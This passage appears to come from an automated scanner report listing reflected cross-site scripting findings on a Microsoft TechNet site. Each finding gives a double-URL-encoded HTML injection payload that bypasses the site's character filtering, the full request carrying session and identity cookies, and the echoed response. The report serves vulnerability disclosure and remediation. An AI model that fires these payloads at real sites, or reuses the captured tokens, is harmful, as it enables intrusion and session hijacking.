17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:44 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library60505"><a>8c06516092b/bb727063" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c6e%2522%253e%253ca%253e5d24c93418e was submitted in the REST URL parameter 3. This input was echoed as f5c6e"><a>5d24c93418e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727063.aspxf5c6e%2522%253e%253ca%253e5d24c93418e HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:28 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727063.aspxf5c6e"><a>5d24c93418e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37706%2522%253e%253ca%253ec498c29b365 was submitted in the REST URL parameter 1. This input was echoed as 37706"><a>c498c29b365 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us37706%2522%253e%253ca%253ec498c29b365/library/bb727064.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:49 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us37706"><a>c498c29b365/library/bb727064" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb58%2522%253e%253ca%253e6f7eb8184e8 was submitted in the REST URL parameter 2. This input was echoed as 6bb58"><a>6f7eb8184e8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library6bb58%2522%253e%253ca%253e6f7eb8184e8/bb727064.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:19:34 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6bb58"><a>6f7eb8184e8/bb727064" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ab2b%2522%253e%253ca%253efc6fb84a5cb was submitted in the REST URL parameter 3. This input was echoed as 4ab2b"><a>fc6fb84a5cb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727064.aspx4ab2b%2522%253e%253ca%253efc6fb84a5cb HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:20:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727064.aspx4ab2b"><a>fc6fb84a5cb" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1793f%2522%253e%253ca%253eb68b233da00 was submitted in the REST URL parameter 1. This input was echoed as 1793f"><a>b68b233da00 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us1793f%2522%253e%253ca%253eb68b233da00/library/bb727067.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:22:24 GMT
